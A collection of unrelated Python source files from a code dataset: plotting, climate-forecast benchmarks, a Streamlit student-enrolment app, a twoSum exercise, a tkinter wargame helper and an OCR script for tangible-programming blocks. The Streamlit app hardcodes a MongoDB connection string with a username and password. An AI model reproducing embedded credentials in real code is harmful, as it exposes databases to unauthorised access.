урон\", \"Средний опыт\", \"Средняя дистанция\"] * len(ship_classes)\n\nfig = make_subplots(rows=len(ship_classes), cols=len(params), subplot_titles=column_titles,\n row_titles=(list(ship_classes)),\n shared_yaxes=True, vertical_spacing=0.01, horizontal_spacing=0,\n row_heights=heigths)\n\nfor i, ship_class in enumerate(ship_classes, start=1):\n data = df_3[df_3[\"ship_class\"] == ship_class]\n z = len(data)\n for j, param in enumerate(params, start=1):\n fig.add_trace(go.Bar(x=data[param], y=data[\"name\"], text=data[param], marker_color=data[param],\n marker_cmin=mins[j - 1], marker_cmax=maxs[j - 1]), i, j)\n fig.update_xaxes(range=[0, ceil(maxs[j - 1])], row=i, col=j)\n\n fig.update_yaxes(nticks=z, secondary_y=True)\n\nfig.update_traces(orientation='h', texttemplate='%{x:.2f}', textfont_size=10, textposition='outside',\n marker_colorscale=[[0, 'rgb(250,5,34)'], [0.5, 'rgb(250,136,5)'], [1.0, 'rgb(5,250,29)']])\nfig.update_layout(showlegend=False, width=1200, height=4000, title=\"Оценка эффективности кораблей\",\n title_font={'size': 24}, title_x=0.5)\nfig.update_xaxes(showticklabels=False, showgrid=False)\nfig.update_annotations(font_size=12)\nfor i in fig['layout']['annotations'][:-5:-1]:\n i['font'] = dict(size=20)\n\nfig.show()\n","repo_name":"ann74/GamesDataAnalysis2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5741,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20785617709","text":"import warnings\n\nimport numpy as np\nimport xarray as xr\nfrom dask.distributed import Client\n\nfrom climpred import HindcastEnsemble, PerfectModelEnsemble, set_options\nfrom climpred.metrics import PROBABILISTIC_METRICS\nfrom climpred.tutorial import load_dataset\n\nfrom . 
import _skip_slow, ensure_loaded, parameterized, randn, requires_dask\n\n# only take a subselection of all possible metrics\nMETRICS = [\"mse\", \"crps\"]\nREFERENCES = [\"uninitialized\", \"climatology\", \"persistence\"]\nITERATIONS = 8\n\nset_options(climpred_warnings=False)\n\n\nwarnings.filterwarnings(\"ignore\", message=\"Index.ravel returning ndarray is deprecated\")\n\n\nclass Compute:\n \"\"\"\n Benchmark time and peak memory of `PredictionEnsemble.verify` and\n `PredictionEnsemble.bootstrap`.\n \"\"\"\n\n # https://asv.readthedocs.io/en/stable/benchmarks.html\n timeout = 300.0\n repeat = 1\n number = 5\n\n def setup(self, *args, **kwargs):\n raise NotImplementedError()\n\n def get_kwargs(self, metric=None, bootstrap=False):\n \"\"\"Adjust kwargs for verify/bootstrap matching with metric.\"\"\"\n if not isinstance(\n self.PredictionEnsemble, (PerfectModelEnsemble, HindcastEnsemble)\n ):\n raise NotImplementedError()\n dim = [\"init\", \"member\"] if metric in PROBABILISTIC_METRICS else \"init\"\n if self.PredictionEnsemble.kind == \"hindcast\":\n comparison = \"m2o\" if metric in PROBABILISTIC_METRICS else \"e2o\"\n elif self.PredictionEnsemble.kind == \"perfect\":\n comparison = \"m2c\" if metric in PROBABILISTIC_METRICS else \"m2e\"\n metric_kwargs = dict(\n metric=metric,\n comparison=comparison,\n dim=dim,\n reference=self.reference,\n )\n if bootstrap:\n metric_kwargs[\"iterations\"] = self.iterations\n metric_kwargs[\"resample_dim\"] = self.resample_dim\n if self.PredictionEnsemble.kind == \"hindcast\":\n metric_kwargs[\"alignment\"] = self.alignment\n return metric_kwargs\n\n @parameterized([\"metric\"], (METRICS))\n def time_verify(self, metric):\n \"\"\"Take time for `PredictionEnsemble.verify`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.verify(\n **self.get_kwargs(metric=metric, bootstrap=False)\n )\n )\n\n @parameterized([\"metric\"], (METRICS))\n def peakmem_verify(self, metric):\n \"\"\"Take memory peak for `PredictionEnsemble.verify`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.verify(\n **self.get_kwargs(metric=metric, bootstrap=False)\n )\n )\n\n @parameterized([\"metric\"], (METRICS))\n def time_bootstrap(self, metric):\n \"\"\"Take time for `PredictionEnsemble.bootstrap`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.bootstrap(\n **self.get_kwargs(metric=metric, bootstrap=True)\n )\n )\n\n @parameterized([\"metric\"], (METRICS))\n def peakmem_bootstrap(self, metric):\n \"\"\"Take memory peak for `PredictionEnsemble.bootstrap`.\"\"\"\n ensure_loaded(\n self.PredictionEnsemble.bootstrap(\n **self.get_kwargs(metric=metric, bootstrap=True)\n )\n )\n\n\nclass GenerateHindcastEnsemble(Compute):\n \"\"\"\n Generate random input data.\n \"\"\"\n\n def get_data(self, spatial_res=5):\n \"\"\"Generates initialized hindcast, uninitialized historical and observational\n data, mimicking a hindcast experiment.\"\"\"\n self.initialized = xr.Dataset()\n self.observations = xr.Dataset()\n self.uninitialized = xr.Dataset()\n\n self.nmember = 10\n self.nlead = 5\n self.nx = 360 // spatial_res\n self.ny = 360 // spatial_res\n self.iterations = ITERATIONS\n self.init_start = 1960\n self.init_end = 2000\n self.ninit = self.init_end - self.init_start\n self.client = None\n\n FRAC_NAN = 0.0\n\n inits = xr.cftime_range(\n start=str(self.init_start), end=str(self.init_end - 1), freq=\"YS\"\n )\n leads = np.arange(1, 1 + self.nlead)\n members = np.arange(1, 1 + self.nmember)\n\n lons = xr.DataArray(\n np.linspace(0.5, 359.5, self.nx),\n dims=(\"lon\",),\n attrs={\"units\": \"degrees east\", \"long_name\": \"longitude\"},\n )\n lats = xr.DataArray(\n np.linspace(-89.5, 89.5, self.ny),\n dims=(\"lat\",),\n attrs={\"units\": \"degrees north\", \"long_name\": \"latitude\"},\n )\n self.initialized[\"var\"] = xr.DataArray(\n randn(\n (self.nmember, self.ninit, self.nlead, self.nx, self.ny),\n frac_nan=FRAC_NAN,\n ),\n coords={\n \"member\": members,\n \"init\": inits,\n \"lon\": lons,\n \"lat\": lats,\n \"lead\": leads,\n },\n dims=(\"member\", \"init\", \"lead\", \"lon\", \"lat\"),\n name=\"var\",\n attrs={\"units\": \"var units\", \"description\": \"a description\"},\n ).squeeze()\n self.observations[\"var\"] = xr.DataArray(\n randn((self.ninit, self.nx, self.ny), frac_nan=FRAC_NAN),\n coords={\"lon\": lons, \"lat\": lats, \"time\": inits},\n dims=(\"time\", \"lon\", \"lat\"),\n name=\"var\",\n attrs={\"units\": \"var units\", \"description\": \"a description\"},\n ).squeeze()\n\n self.uninitialized[\"var\"] = xr.DataArray(\n randn((self.ninit, self.nx, self.ny, self.nmember), frac_nan=FRAC_NAN),\n coords={\"lon\": lons, \"lat\": lats, \"time\": inits, \"member\": members},\n dims=(\"time\", \"lon\", \"lat\", \"member\"),\n name=\"var\",\n attrs={\"units\": \"var units\", \"description\": \"a description\"},\n ).squeeze()\n\n self.initialized.attrs = {\"history\": \"created for xarray benchmarking\"}\n self.initialized.lead.attrs[\"units\"] = \"years\"\n\n self.PredictionEnsemble = (\n HindcastEnsemble(self.initialized)\n .add_uninitialized(self.uninitialized)\n .add_observations(self.observations)\n )\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.alignment = \"same_inits\"\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GeneratePerfectModelEnsemble(GenerateHindcastEnsemble):\n \"\"\"Generate `PerfectModelEnsemble` out of `HindcastEnsemble`.\"\"\"\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.PredictionEnsemble = PerfectModelEnsemble(self.initialized).add_control(\n self.observations\n )\n self.PredictionEnsemble = self.PredictionEnsemble.generate_uninitialized()\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GenerateHindcastEnsembleSmall(GenerateHindcastEnsemble):\n \"\"\"Generate single grid point `HindcastEnsemble`.\"\"\"\n\n def setup(self, *args, **kwargs):\n self.get_data(spatial_res=360)\n self.PredictionEnsemble = (\n HindcastEnsemble(self.initialized)\n .add_uninitialized(self.uninitialized)\n .add_observations(self.observations)\n )\n self.alignment = \"same_inits\"\n self.resample_dim = \"member\"\n self.reference = None\n self.iterations = ITERATIONS\n\n\nclass GenerateHindcastEnsembleSmallReferences(GenerateHindcastEnsembleSmall):\n \"\"\"Generate single grid point `HindcastEnsemble` with all references.\"\"\"\n\n def setup(self, *args, **kwargs):\n _skip_slow()\n super().setup(**kwargs)\n # keep REFERENCES here; resetting self.reference to None afterwards would\n # defeat the purpose of this benchmark class\n self.reference = REFERENCES\n self.alignment = \"maximize\"\n self.resample_dim = \"member\"\n\n\nclass GeneratePerfectModelEnsembleSmall(GeneratePerfectModelEnsemble):\n \"\"\"Generate single grid point `PerfectModelEnsemble`.\"\"\"\n\n def setup(self, *args, **kwargs):\n self.get_data(spatial_res=360)\n self.PredictionEnsemble = PerfectModelEnsemble(self.initialized).add_control(\n self.observations\n )\n self.PredictionEnsemble = self.PredictionEnsemble.generate_uninitialized()\n self.alignment = None\n self.reference = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GeneratePerfectModelEnsembleSmallReferences(GeneratePerfectModelEnsembleSmall):\n \"\"\"Generate single grid point `PerfectModelEnsemble` with all references.\"\"\"\n\n def setup(self, *args, **kwargs):\n _skip_slow()\n super().setup(**kwargs)\n self.reference = REFERENCES\n self.alignment = None\n self.resample_dim = \"member\"\n self.iterations = ITERATIONS\n\n\nclass GenerateHindcastEnsembleDask(GenerateHindcastEnsemble):\n def setup(self, *args, **kwargs):\n \"\"\"The same tests but on spatially chunked data.\"\"\"\n _skip_slow()\n requires_dask()\n super().setup(**kwargs)\n # chunk along a spatial dimension to enable embarrassingly parallel computation\n self.PredictionEnsemble = self.PredictionEnsemble.chunk({\"lead\": 1}).chunk(\n {\"lon\": \"auto\"}\n )\n\n\nclass GenerateHindcastEnsembleDaskDistributed(GenerateHindcastEnsembleDask):\n def setup(self, *args, **kwargs):\n \"\"\"The same tests but on spatially chunked data with dask.distributed.Client.\"\"\"\n _skip_slow()\n requires_dask()\n super().setup(**kwargs)\n self.client = Client()\n\n def cleanup(self):\n self.client.shutdown()\n\n\nclass S2S(Compute):\n \"\"\"Tutorial data from S2S project.\"\"\"\n\n number = 3\n\n def get_data(self):\n _skip_slow()\n init = load_dataset(\"ECMWF_S2S_Germany\").t2m.isel(lead=slice(None, None, 7))\n obs = load_dataset(\"Observations_Germany\").t2m\n self.PredictionEnsemble = (\n HindcastEnsemble(init).add_observations(obs).generate_uninitialized()\n )\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.alignment = \"maximize\"\n self.resample_dim = \"init\"\n self.reference = None\n self.iterations = ITERATIONS\n\n\nclass NMME(Compute):\n \"\"\"Tutorial data from NMME project.\"\"\"\n\n def get_data(self):\n init = (\n load_dataset(\"NMME_hindcast_Nino34_sst\")\n .isel(model=0)\n .sel(S=slice(\"1985\", \"2005\"))\n )\n obs = load_dataset(\"NMME_OIv2_Nino34_sst\")\n self.PredictionEnsemble = (\n HindcastEnsemble(init).add_observations(obs).generate_uninitialized()\n )\n\n def setup(self, *args, **kwargs):\n self.get_data()\n self.alignment = \"maximize\"\n self.resample_dim = \"init\"\n self.reference = None\n self.iterations = ITERATIONS\n","repo_name":"pangeo-data/climpred","sub_path":"asv_bench/benchmarks/benchmarks_PredictionEnsemble.py","file_name":"benchmarks_PredictionEnsemble.py","file_ext":"py","file_size_in_byte":10787,"program_lang":"python","lang":"en","doc_type":"code","stars":210,"dataset":"github-code","pt":"48"}
+{"seq_id":"43123652023","text":"import numpy as np\nimport streamlit as st\nimport streamlit_authenticator as stauth\nimport yaml\nimport pymongo\nfrom datetime import datetime\nimport pandas as pd\n\n# Connect to the MongoDB database\nclient = pymongo.MongoClient(\"mongodb+srv://equipo3:password3@cluster0.gkaurda.mongodb.net/?retryWrites=true&w=majority\")\n\nstremlit_db = client[\"streamlitApp\"]\n\nenrolled_students = stremlit_db[\"enrolledStudents\"]\nsocial_service_db = client[\"DireccionSS\"]\nstudents = social_service_db[\"students\"]\npartner_projects = social_service_db[\"partnerProjects\"]\nprojects_collection = social_service_db[\"projects\"]\n\ndef overlap(start1, end1, start2, end2):\n return start1 <= end2 and end1 >= start2\n\nwith open('./config.yaml') as file:\n config = yaml.load(file, Loader=yaml.SafeLoader)\n\nauthenticator = stauth.Authenticate(\n config['credentials'],\n config['cookie']['name'],\n config['cookie']['key'],\n config['cookie']['expiry_days'],\n config['preauthorized']\n)\n\nname, 
authentication_status, username = authenticator.login('Login', 'main')\n\n\nif authentication_status:\n authenticator.logout('Logout', 'main')\n if username == \"socioformador1\":\n partner_id = \"SF246543\"\n elif username == \"socioformador2\":\n partner_id = \"SF680682\"\n\n partner_project_doc = partner_projects.find_one({\"partnerID\": partner_id})\n st.write(f'Bienvenido *{name}*')\n tab1, tab2 = st.tabs([\"Inscribir\", \"Ver Estudiantes Inscritos\"])\n with tab1:\n studentID = st.text_input('**Matrícula**')\n projects = partner_project_doc[\"projectsIDs\"]\n if studentID:\n document = students.find_one({\"studentID\": studentID})\n if document:\n name = document[\"name\"]\n major = document[\"major\"]\n hasInductionWeek = document[\"hasInductionWeek\"]\n if hasInductionWeek:\n hasIW = \"Sí\"\n else:\n hasIW = \"No\"\n st.write(\"Nombre: \", name)\n st.write(\"Carrera: \", major)\n st.write(\"Requisito Semana Inducción: \", hasIW)\n else:\n st.error(\"No se ha encontrado el estudiante\")\n option = st.selectbox(\n '**Elige el proyecto**', [\"\"]+projects)\n if option:\n selected_project = projects_collection.find_one({\"projectID\": option})\n project_name = selected_project[\"name\"]\n project_start_date = selected_project[\"startDate\"].strftime(\"%d/%m/%Y\")\n project_end_date = selected_project[\"endDate\"].strftime(\"%d/%m/%Y\")\n\n st.write(\"Nombre: \", project_name)\n st.write(\"Fecha de Inicio: \", project_start_date)\n st.write(\"Fecha de Fin: \", project_end_date)\n\n if st.button('Enviar'):\n if not studentID:\n st.error(\"Por favor escribe la matrícula del estudiante\")\n elif not option:\n st.error(\"Por favor selecciona un proyecto\")\n else: \n existing_record = enrolled_students.find_one({\"studentID\": studentID})\n new_project = projects_collection.find_one({\"projectID\": option})\n\n if existing_record:\n existing_project = projects_collection.find_one({\"projectID\": existing_record[\"projectID\"]})\n start1 = existing_project[\"startDate\"]\n end1 = existing_project[\"endDate\"]\n start2 = new_project[\"startDate\"]\n end2 = new_project[\"endDate\"]\n\n if existing_record and overlap(start1, end1, start2, end2):\n st.error(\"El estudiante ya tiene un proyecto asignado durante este periodo\")\n elif not hasInductionWeek:\n st.error(\"El alumno no cumple con el requisito de semana de inducción\")\n elif new_project[\"quota\"] <= 0:\n st.error(\"El proyecto ha llegado al límite de estudiantes\")\n else:\n st.write('Enviado')\n document = {\n \"studentID\": studentID,\n \"projectID\": option\n }\n enrolled_students.insert_one(document)\n result = projects_collection.update_one(\n {\"projectID\": option},\n {\"$inc\": {\"quota\": -1}}\n )\n with tab2:\n # Create a sample dataframe\n students_data = []\n for student in enrolled_students.find({}, {'_id': 0}):\n students_data.append(student)\n df = pd.DataFrame(students_data)\n df.columns = ['Matrícula', 'Proyecto']\n df.index += 1\n st.table(df[['Matrícula', 'Proyecto']])\n\nelif authentication_status == False:\n st.error('Username/password is incorrect')\nelif authentication_status == None:\n st.warning('Please enter your username and password')","repo_name":"CarlosToapantaN/TI3005B_Frontend","sub_path":"streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74012146065","text":"from django.test import TestCase\n\n\n#def counter(func):\n #COUNTER = 0\n #def wrapper():\n 
#print('Before')\n #nonlocal COUNTER\n #COUNTER +=1\n #print(COUNTER)\n # result = func()\n #print(f\"Result:{result}\")\n #print('After')\n #return wrapper\n\n#@counter\n#def foo():\n #return \"None\"\n\n#foo = counter(foo)\n#foo()\n#foo()\n#foo()\n\nclass Solution(object):\n def twoSum(self, nums, target):\n # Single pass with a value->index map: for each number, check whether\n # its complement (target - number) has already been seen.\n seen = {}\n for idx, num in enumerate(nums):\n residual = target - num\n if residual in seen:\n return [seen[residual], idx]\n seen[num] = idx\n return []\n\n\nnum = [2,7,11,15]\ntarg = 9\ntest = Solution()\nprint(test.twoSum(num,targ))\n","repo_name":"IgorOkSuhov/Test_Blog_Books","sub_path":"user/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"21577359967","text":"from tkinter import Label, Toplevel, Radiobutton, BooleanVar\nfrom tkinter import Entry\nfrom tkinter import Button\nfrom tkinter import END\nfrom tkinter.ttk import Combobox, Checkbutton\nfrom random import randint\n\nclass ElectronicDetection(Toplevel):\n def __init__(self, parent):\n\n super().__init__(parent)\n self.title('Electronic Detection')\n self.geometry(\"280x140+10+10\")\n\n self.side = BooleanVar()\n self.side.set(True)\n\n self.non_allied_r = Radiobutton(self, text='Non-allied', variable=self.side, value=False)\n self.allied_r = Radiobutton(self, text='Allied', variable=self.side, value=True)\n\n self.non_allied_cyber = BooleanVar()\n self.non_allied_cyber.set(False)\n self.non_allied_cyber_chk = Checkbutton(self, text='Non-allied cyberattack', variable=self.non_allied_cyber)\n\n self.allied_cyber = BooleanVar()\n self.allied_cyber.set(False)\n self.allied_cyber_chk = Checkbutton(self, text='Allied cyberattack', variable=self.allied_cyber)\n\n self.result_btn = Button(self, text='Detection', command=self.detection_result)\n self.result_lbl = Label(self, text='Det:')\n self.result_ent = Entry(self, width=5)\n\n self.result_btn.place(x=20, y=70)\n self.result_ent.place(x=60, y=100)\n self.result_lbl.place(x=20, y=100)\n self.non_allied_r.place(x=20, y=20)\n self.allied_r.place(x=20, y=40)\n self.allied_cyber_chk.place(x=110, y=20)\n self.non_allied_cyber_chk.place(x=110, y=40)\n\n def detection_result(self):\n self.result_ent.delete(0, 'end')\n\n d10 = randint(0, 9)\n\n result = '-'\n\n if self.side.get():\n if self.allied_cyber.get():\n d10 -= 2\n if self.non_allied_cyber.get():\n d10 += 2\n if d10 < 5:\n result = 'D'\n else:\n if self.allied_cyber.get():\n d10 += 2\n if self.non_allied_cyber.get():\n d10 -= 2\n if d10 < 3:\n result = 'D'\n\n self.result_ent.insert(END, result)","repo_name":"KordianChi/NextWar_wargame_calculator","sub_path":"electronic_detection.py","file_name":"electronic_detection.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"36965695962","text":"import numpy as np \nimport matplotlib.pyplot as plt \nimport cv2 as cv\nimport pytesseract\nimport os\nimport imutils\nimport argparse\nimport tang_module as tg\nfrom anytree import Node, 
RenderTree\nfrom PIL import Image\n\n# Construct the argument parser and parse the arguments.\nap = argparse.ArgumentParser()\nap.add_argument('-i', '--image', required=True,\n help = \"path to tangible program image\")\nap.add_argument('-p', '--pre', action='store_true',\n help = \"preprocessing and masks generation debug plots\")\nap.add_argument('-o', '--ocr', action='store_true',\n help = \"ocr debug plots\")\nargs = vars(ap.parse_args())\n\n# Load image.\nimage = cv.imread(args['image'])\nif image is None or image.size == 0:\n print('the image cannot be read (because of missing file, \\\nimproper permissions, unsupported or invalid format)')\n exit(0)\n\n#############################################\n# 1. Preparing the image for pre-processing.#\n#############################################\n\n# Resizing image to make processing faster\nratio = image.shape[0] / 500.0\norig = image.copy()\nimage = imutils.resize(image, height = 500)\n\n# In case automatic perspective transformation fails, the user is \n# prompted to manually select the paper's edges.\n# TODO: this doesn't account for user error.\nselection_counter = 0\nmanual_selection = []\n\ndef coordinates(event, x, y, flags, param):\n global selection_counter, screenCnt\n \n if event == cv.EVENT_LBUTTONDOWN and selection_counter < 4:\n cv.circle(image, (x,y), 5, (255,200,0), -1)\n # print(x, y)\n manual_selection.append([[x, y]])\n selection_counter += 1\n \n# Automatic point selection; assumes that the whole A4 paper is \n# visible.\nscreenCnt = tg.find_points(image)\n\n# Manual point selection.\nif len(screenCnt) == 0:\n print('Perspective transformation failed')\n cv.namedWindow('point_selection', cv.WINDOW_NORMAL)\n cv.setMouseCallback('point_selection', coordinates)\n print('Choose paper\\'s edges manually\\npress \\'q\\' to exit.')\n while(True):\n cv.imshow('point_selection', image)\n key = cv.waitKey(1) & 0xFF\n \n if key == ord(\"q\"):\n cv.destroyAllWindows()\n break\n screenCnt = np.array(manual_selection)\n if selection_counter < 4:\n print('You have to select 4 edges')\n exit(0)\n\n# Perspective transformation\nimage = tg.four_point_transform(orig, screenCnt.reshape(4,2)*ratio)\n\n################################################\n# 2. Pre-Processing and block masks generation.#\n################################################\n\n# Color balance \nbalanced_img = tg.white_balance(image)\n\n# Original image to HSV\nhsv_A = cv.cvtColor(balanced_img, cv.COLOR_RGB2HSV)\n\n# Split each channel\nh,s,v = cv.split(hsv_A)\n\n# Threshold saturation channel\nret3, th_saturation = cv.threshold(s, 0, 255,\\\n cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n# Dilating thresholded image to remove letters\n# TODO: dilate only per block mask (?) 
this may also dilate noise\nDILATION_WINDOW_SIZE = 3\nDILATION_ITERATIONS = 5\nEROSION_WINDOW_SIZE = 3\nEROSION_ITERATIONS = 3\n\nkernel = cv.getStructuringElement(cv.MORPH_RECT,\\\n (DILATION_WINDOW_SIZE,DILATION_WINDOW_SIZE))\nth_saturation = cv.dilate(th_saturation, kernel \\\n ,iterations = DILATION_ITERATIONS)\n\n# Erosion to remove noise\nkernel = np.ones((EROSION_WINDOW_SIZE,EROSION_WINDOW_SIZE),np.uint8)\nth_saturation = cv.erode(th_saturation,kernel,\\\n iterations = EROSION_ITERATIONS)\n\n# Using connected components (CC) method to label each block\nnum_labels, labels_im = cv.connectedComponents(th_saturation)\n\n# Plotting general debug images\nif args['pre']:\n fig = plt.figure(figsize=(14,5))\n fig.suptitle('Pre-Processing and block masks generation', \\\n fontsize= 18)\n plt.subplot(1, 4, 1)\n plt.title('Original Image')\n plt.imshow(cv.cvtColor(orig, cv.COLOR_BGR2RGB))\n plt.subplot(1, 4, 2)\n plt.title('Perspective Transformation &\\nColor Balance')\n plt.imshow(cv.cvtColor(balanced_img, cv.COLOR_BGR2RGB))\n plt.subplot(1, 4, 3)\n plt.title('Saturation Channel')\n plt.imshow(s)\n plt.subplot(1, 4, 4)\n plt.title('Thresholded Saturation Channel')\n plt.imshow(th_saturation, cmap='gray')\n plt.show()\n\n# Original image to grayscale\ngray_A = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\n# Used for filtering components based on a percentage of the image's size\nlow_filter = .0005*np.prod(image.shape) \n\n# Dilation to remove letters from masks.\nMASK_WS = 4\nmask_dilation = cv.getStructuringElement(cv.MORPH_RECT,\\\n (MASK_WS, MASK_WS))\n\ncounter = 0\nprint('Collecting block information')\nfor num in range(1, num_labels):\n\n # Extracting mask from (CC) result\n label = labels_im == num\n block_mask = np.copy(th_saturation)\n block_mask[label == False] = 0\n block_mask[label == True] = 255 \n \n # Filtering features.\n if cv.countNonZero(block_mask) < low_filter:\n continue\n \n # Find coordinates (x, y) and height and width of the block (h, w) \n # based on the block's mask\n contours, _ = cv.findContours(block_mask, cv.RETR_TREE, \\\n cv.CHAIN_APPROX_SIMPLE)\n x,y,w,h = cv.boundingRect(contours[0])\n\n # This is the second time this is applied, this time in each \n # individual mask.\n block_mask = cv.dilate(block_mask, mask_dilation,iterations = 3)\n \n # Masking to extract the block's image feature from the grayscale image.\n feature = cv.bitwise_and(gray_A, gray_A, mask=block_mask) \n\n # Save block information.\n nb = tg.new_block('unprocessed', x, y, w, h, feature)\n counter +=1 \n\nprint('Found {} blocks in image'.format(counter))\nsorted_blocks = sorted(tg.block_list, key=lambda block: block.coord_sum)\n\n# Calculating mean height of blocks to be used to identify control\n# blocks and correctly crop them out of the original image.\nheight_sum = 0\nfor block in sorted_blocks:\n height_sum += block.height\n \nmean_height = height_sum/counter\n\n#############################\n# 3. Preparing text for OCR #\n#############################\n\n# Kernels that will be used in erosion-dilation morphological \n# transformations.\nerosion_kernel = cv.getStructuringElement(cv.MORPH_RECT, (5,5))\ndilation_kernel = cv.getStructuringElement(cv.MORPH_RECT, (2,2))\n\nfor block in sorted_blocks:\n # Cropping each block to help with binarization later\n # Using a temporary cropping solution to crop control blocks. 
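The margins below are hand-tuned: crop_v is a fixed pixel offset while crop_h and crop_right are fractions of the block's height and width.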
\n\n # TODO: find a better way to crop text of blocks \n # (maybe use image_to_data() from Tesseract).\n \n crop_v = 18\n crop_right = int(.08*block.width)\n if block.height > mean_height or block.height > 150:\n crop_h = int(.58*block.height)\n feature = \\\n block.feature[block.y+crop_v: block.y+block.height-crop_h, \n block.x+crop_v: block.x+block.width-crop_right]\n else:\n feature = \\\n block.feature[block.y+crop_v:block.y+block.height-crop_v, \n block.x+crop_v: block.x+block.width-crop_right]\n \n # Filtering out empty features.\n if feature.size == 0: continue\n\n # Upscale feature image to have more pixels to work with for\n # morphological transformations.\n multiplier = 2\n feature = cv.resize(feature, dsize=(feature.shape[1]*multiplier, \\\n feature.shape[0]*multiplier), interpolation=cv.INTER_CUBIC)\n\n # Blurring to make binarization more accurate.\n feature = cv.GaussianBlur(feature,(5,5),0)\n\n # Binarize and invert feature.\n ret3, th_feature = cv.threshold(feature, 0, 255, \\\n cv.THRESH_BINARY+cv.THRESH_OTSU)\n\n # Morphological transformations.\n erosion = cv.erode(th_feature, erosion_kernel, iterations = 1)\n dilation = cv.dilate(erosion, dilation_kernel,iterations = 1)\n inv_feature = np.invert(dilation)\n\n ######################\n # 4. Collecting data #\n ######################\n \n # Tesseract.\n config = '--psm 7'\n tesseract_output = pytesseract.image_to_string(inv_feature, \\\n lang='eng', config=config)\n\n # Remove spaces and newlines.\n text_in_block = ' '.join(tesseract_output.split())\n\n # Match text to expected text.\n if not (tg.similar(text_in_block, 'Variable') > 0.8): \n # Don't compare variable as it is likely to be matched with\n # the wrong text.\n text_in_block = tg.similar_to_exp_text(text_in_block)\n block.set_text(text_in_block)\n else:\n block.set_text(text_in_block)\n\n # Print masking - Tesseract results.\n if args['ocr']:\n fig = plt.figure(figsize=(8,5))\n fig.suptitle('Tesseract results & Block Mask', fontsize=18)\n plt.title('Tesseract & Masking ')\n plt.subplot(1,2,1)\n plt.title('Block\\'s id: {} at ({}, {})\\n Tesseract read: {}'\\\n .format(block.b_id, block.x, block.y,\\\n ' '.join(tesseract_output.split())))\n plt.imshow(inv_feature, cmap='gray')\n plt.subplot(1,2,2)\n plt.title('Block\\'s Mask')\n plt.imshow(block.feature)\n plt.show()\n\n#####################\n# 5. 
AST generation #\n#####################\n\n# Base anytree library node, used to connect all nodes of the tangible\n# program.\nroot = Node('tangible program')\nprevious_node = root \n\n# Keeping all the blocks that initiate a new nesting level in this list.\nnesting_node_list = []\nNESTING_LIST_INDEX = 0\n\n# Add node on the correct nesting level.\ndef add_node_on_nest_lvl(block):\n if len(nesting_node_list) == 0:\n previous_node = Node(block.text, parent=root)\n else:\n previous_node = Node(block.text, parent=nesting_node_list[-1])\n return previous_node\n\n\ndef get_next_block():\n # Simple function to improve readability below;\n # returns the next block in the sorted_blocks list.\n global NESTING_LIST_INDEX\n if NESTING_LIST_INDEX >= len(sorted_blocks):\n return None\n ret = sorted_blocks[NESTING_LIST_INDEX]\n NESTING_LIST_INDEX += 1\n return ret\n\n\nblock_has_attached = False \n# Pointer to correctly connect control blocks that have both attached\n# and blocks underneath them (if-do type of blocks).\nif_do_ind_block = None\ncurrent_block = get_next_block()\nwhile current_block != None:\n\n # Skip all 'unprocessed' blocks, assuming they will be noise.\n if tg.similar(current_block.text, 'unprocessed') > 0.7:\n current_block = get_next_block()\n continue\n \n # 'b_tab' block removes an indentation level.\n if tg.similar(current_block.text, 'b_tab') > 0.7:\n nesting_node_list.pop()\n current_block = get_next_block()\n continue\n \n # Case 1 : Blocks attached to the right of current_block.\n next_block = tg.get_block_attached_to(current_block)\n if next_block != None : \n previous_node = add_node_on_nest_lvl(current_block)\n # Keeping parent information so that we can return to \n # the parent_block once we have found all the attached blocks.\n parent_node = previous_node\n parent_block = current_block \n \n # Iterate through attached blocks.\n while next_block != None:\n block_has_attached = True\n previous_node = Node(next_block.text, parent=previous_node)\n current_block = get_next_block()\n next_block = tg.get_block_attached_to(current_block)\n\n # Done collecting attached blocks; restore the parent context.\n if block_has_attached:\n block_has_attached = False \n # Using the parent_block variable \n # to continue searching.\n current_block = parent_block \n # Reset tree node to parent node.\n previous_node = parent_node \n current_block = get_next_block()\n\n if tg.is_control_block(parent_block.text): \n # In the current state of the project this is reached\n # by if do.\n if_do_ind_block = tg.get_block_indented_to(parent_block)\n if current_block.b_id == if_do_ind_block.b_id:\n nesting_node_list.append(parent_node)\n continue\n else:\n continue\n \n # Case 2: block has other blocks indented to it.\n next_block = tg.get_block_indented_to(current_block)\n if next_block != None:\n # Add current block to tree (current indentation lvl).\n previous_node = add_node_on_nest_lvl(current_block)\n # Append the current node to the indentation list.\n nesting_node_list.append(previous_node) \n # This is the actual indented node.\n current_block = get_next_block() \n continue\n\n # Case 3: block has other blocks underneath. 
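These become siblings at the current nesting level, so a plain sequence of blocks stays flat in the tree.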
